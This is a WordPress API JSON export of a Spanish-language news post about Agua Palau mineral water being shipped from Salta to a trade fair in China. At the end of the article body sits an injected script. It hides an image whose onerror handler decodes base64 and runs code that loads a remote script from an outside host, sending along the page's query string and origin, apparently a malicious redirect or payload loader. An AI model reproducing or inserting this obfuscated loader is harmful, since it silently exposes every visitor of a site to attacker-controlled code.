{"id":7182,"date":"2023-08-09T13:53:55","date_gmt":"2023-08-09T16:53:55","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7182"},"modified":"2025-08-13T15:55:47","modified_gmt":"2025-08-13T18:55:47","slug":"la-calidad-de-agua-palau-llegara-a-china","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7182","title":{"rendered":"La calidad de Agua Palau llegar\u00e1 a China"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#054b74\"><em>La marca salte\u00f1a formar\u00e1 parte de los servicios que se ofrecer\u00e1n en una feria internacional que se llevar\u00e1 a cabo a fines de agosto. Ya parti\u00f3 el primer cargamento de productos hacia ese pa\u00eds.<\/em><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-7028\" width=\"318\" height=\"159\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 318px) 100vw, 318px\" \/><\/a><figcaption class=\"wp-element-caption\"><strong><em><sup><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad:<\/mark><\/sup><\/em><\/strong><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El secretario de Industria, Comercio y Empleo del Ministerio de Producci\u00f3n y Desarrollo Sustentable,&nbsp;<strong>Nicol\u00e1s Avellaneda<\/strong>&nbsp;recibi\u00f3 al gerente general de Agua Palau,&nbsp;<strong>Francisco Alderete<\/strong>, para conocer detalles sobre los avances que esta empresa normalizada por el Gobierno de la Provincia, mantiene desde su concesi\u00f3n.<\/p>\n\n\n\n<p>En la ocasi\u00f3n, el representante de la firma brind\u00f3 aspectos sobre las gestiones realizadas para enviar el primer cargamento de productos que ingresar\u00e1n a China en los pr\u00f3ximos d\u00edas, buscando conquistar ese mercado internacional.<\/p>\n\n\n\n<p>Agua Palau formar\u00e1 parte del servicio que se brindar\u00e1 en una feria internacional prevista para fines de agosto en ese pa\u00eds, para lo cual envi\u00f3 aproximadamente 13 pallets de agua mineral sin gas, envasada en botellas de 500 cc. Este cargamento ser\u00e1 recibido por el consulado de Argentina en China para su posterior distribuci\u00f3n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8279-la-calidad-de-agua-palau-llegara-a-china.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8279-la-calidad-de-agua-palau-llegara-a-china.jpg\" alt=\"La calidad de Agua Palau llegar\u00e1 a China\" width=\"397\" height=\"262\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>La presencia del producto salte\u00f1o en este evento, servir\u00e1 para demostrar las bondades del recurso considerado como Premium a nivel mundial y posibilitar\u00e1 establecer contacto con varios proveedores locales chinos, para entablar negocios que posibiliten la exportaci\u00f3n futura de los productos Palau.<\/p>\n\n\n\n<p>De acuerdo al plan de expansi\u00f3n que diagram\u00f3 la empresa que tom\u00f3 la administraci\u00f3n de la marca luego de un proceso de normalizaci\u00f3n concretado desde el Ministerio de Producci\u00f3n y Desarrollo Sustentable, los productos se venden en Buenos Aires, Tierra del Fuego, Jujuy, Tucum\u00e1n, y pr\u00f3ximamente se comercializar\u00e1n en Formosa, Santiago del Estero y Catamarca, entre otros lugares.<\/p>\n\n\n\n<p>Desde la compa\u00f1\u00eda informaron que entre junio y julio, meses considerados de temporada baja, se duplic\u00f3 casi la comercializaci\u00f3n de los productos, pasando de 370 mil litros vendidos el a\u00f1o pasado en este per\u00edodo, a 800 mil litros en 2023, con proyecci\u00f3n de superar la producci\u00f3n de un mill\u00f3n cien mil de litros en los pr\u00f3ximos meses.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8280-la-calidad-de-agua-palau-llegara-a-china.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8280-la-calidad-de-agua-palau-llegara-a-china.jpg\" alt=\"La calidad de Agua Palau llegar\u00e1 a China\" width=\"360\" height=\"237\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Nicol\u00e1s Avellaneda destac\u00f3 que \u201ces gratificante ver como luego de varias administraciones fallidas que ten\u00eda esta marca salte\u00f1a, \u00edcono de nuestra provincia, hoy se proyecta a nivel nacional e internacional, poniendo a Salta entre las mejores productoras de agua del pa\u00eds\u201d.<\/p>\n\n\n\n<p>El funcionario recalc\u00f3 adem\u00e1s, que \u201cAgua Palau est\u00e1 en condiciones de competir con las mejores aguas del mundo y est\u00e1 considerada como Premium por su \u00f3ptima calidad, por eso estamos seguros de que ser\u00e1 muy factible su ingreso a mercados extranjeros, para lo cual vamos a trabajar con la empresa para brindarles asistencia t\u00e9cnica y gestiones que faciliten su oferta exportable\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-calidad-de-agua-palau-llegara-a-china-91049\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La marca salte\u00f1a formar\u00e1 parte de los servicios que se ofrecer\u00e1n en una feria internacional que se llevar\u00e1 a cabo a fines de agosto. Ya parti\u00f3 el primer cargamento de productos hacia ese pa\u00eds. El secretario de Industria, Comercio y Empleo del Ministerio de Producci\u00f3n y Desarrollo Sustentable,&nbsp;Nicol\u00e1s Avellaneda&nbsp;recibi\u00f3 al gerente general de Agua Palau,&nbsp;Francisco [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7183,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-7182","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7182"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7182\/revisions"}],"predecessor-version":[{"id":10337,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7182\/revisions\/10337"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7183"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}